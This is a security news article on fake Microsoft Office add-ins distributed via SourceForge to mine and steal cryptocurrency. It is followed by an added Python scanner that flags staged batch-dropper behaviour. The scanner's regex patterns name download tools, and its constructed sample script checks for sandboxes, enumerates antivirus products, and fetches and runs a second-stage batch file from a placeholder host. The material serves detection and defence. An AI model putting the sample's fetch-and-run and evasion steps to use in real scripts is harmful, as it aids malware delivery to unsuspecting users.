Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency.

SourceForge.net is a legitimate software hosting and distribution platform that also supports version control, bug tracking, and dedicated forums/wikis, making it very popular among open-source project communities. Although its open project submission model gives plenty of margin for abuse, actually seeing malware distributed through it is a rare occurrence.

The "officepackage" project presents itself as a collection of Office Add-in development tools, with its description and files being a copy of the legitimate Microsoft project 'Office-Addin-Scripts,' available on GitHub.

However, when users search for office add-ins on Google Search (and other engines), they get results pointing to "officepackage.sourceforge.io," powered by a separate web hosting feature SourceForge gives to project owners. While the malicious project is no longer available on SourceForge, Kaspersky says the project had been indexed by search engines, bringing traffic from users searching for "office add-ins" or similar.

The batch script in the infection chain checks whether it is running in a sandbox or virtual machine and which antivirus products are active, then downloads another batch script (confvz.bat) and unpacks the RAR archive.

Users are advised to download software only from trusted publishers they can verify, to prefer the official project channels (in this case GitHub), and to scan all downloaded files with an up-to-date antivirus tool before running them.

Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.
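The staged behaviour described above (sandbox/VM checks, antivirus enumeration, fetching a second-stage batch file, unpacking a RAR archive) is what a responder would look for when triaging a suspicious batch file. The following Python scanner is an added example, not code from the article or from Kaspersky's analysis: it flags each of those four behaviours in batch-script text using common heuristic patterns. The sample script, the example.invalid URL and the file names in it are constructed for the demo and are not the real officepackage dropper.

```python
"""Static triage for staged Windows batch droppers (added example).

Scans batch-script text for four behaviours typical of a staged dropper:
sandbox/VM checks, antivirus enumeration, second-stage download, and
archive extraction. The indicator patterns are generic heuristics, not
signatures from any specific campaign.
"""
import re

# Each category maps to regexes commonly seen in cmd/batch droppers.
# Lines are lower-cased before matching, so the patterns are lower-case.
INDICATORS = {
    "vm_or_sandbox_check": [
        r"\bsysteminfo\b",
        r"\bwmic\b[^\n]*\b(computersystem|bios|baseboard)\b",
        r"\b(vbox|vmware|virtualbox|qemu|hyper-?v|sandbox)\b",
    ],
    "antivirus_enumeration": [
        r"securitycenter2",
        r"antivirusproduct",
        r"\btasklist\b",
        r"\b(msmpeng|defender|kaspersky|avast|avg|eset|mcafee)\b",
    ],
    "second_stage_download": [
        r"\bcertutil\b[^\n]*-urlcache",
        r"\bbitsadmin\b[^\n]*/transfer",
        r"\bcurl\b[^\n]*https?://",
        r"\bpowershell\b[^\n]*(downloadfile|downloadstring|invoke-webrequest)",
    ],
    "archive_extraction": [
        r"\b(winrar|unrar|rar\.exe|7z|7za)\b[^\n]*\b(x|e)\b",
        r"\.rar\b",
    ],
}

# Constructed sample for the demo; not the real dropper.
SAMPLE_SCRIPT = """@echo off
rem -- constructed sample for the demo, not the real dropper --
wmic computersystem get model | findstr /i "virtual vmware vbox" && exit
tasklist | findstr /i "MsMpEng avp.exe" > %TEMP%\\av.txt
wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName
curl -s -o %TEMP%\\stage2.bat https://example.invalid/stage2.bat
unrar x -p%KEY% %TEMP%\\payload.rar %TEMP%\\out\\
call %TEMP%\\stage2.bat
"""


def scan_batch(text):
    """Return {category: [(line_no, line), ...]} for every category hit."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        lowered = line.lower()
        for category, patterns in INDICATORS.items():
            if any(re.search(p, lowered) for p in patterns):
                hits.setdefault(category, []).append((lineno, line.strip()))
    return hits


def verdict(hits):
    """Three or more of the four behaviours together is a strong dropper signal."""
    present = len(hits)
    if present >= 3:
        return "likely staged dropper"
    if present >= 1:
        return "suspicious"
    return "no indicators"


if __name__ == "__main__":
    found = scan_batch(SAMPLE_SCRIPT)
    for category, lines in found.items():
        print(category)
        for lineno, line in lines:
            print(f"  line {lineno}: {line}")
    print("verdict:", verdict(found))
```

Each category fires at most once per line, so a single `wmic` query that both fingerprints hardware and lists antivirus products is counted under both behaviours only if it matches both pattern sets. The heuristics are meant for triage, not blocking: a legitimate installer may legitimately call `tasklist` or `7z x`, which is why the verdict requires several behaviours to appear together.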
This Cyber News was published on www.bleepingcomputer.com. Publication date: Tue, 08 Apr 2025 20:55:12 +0000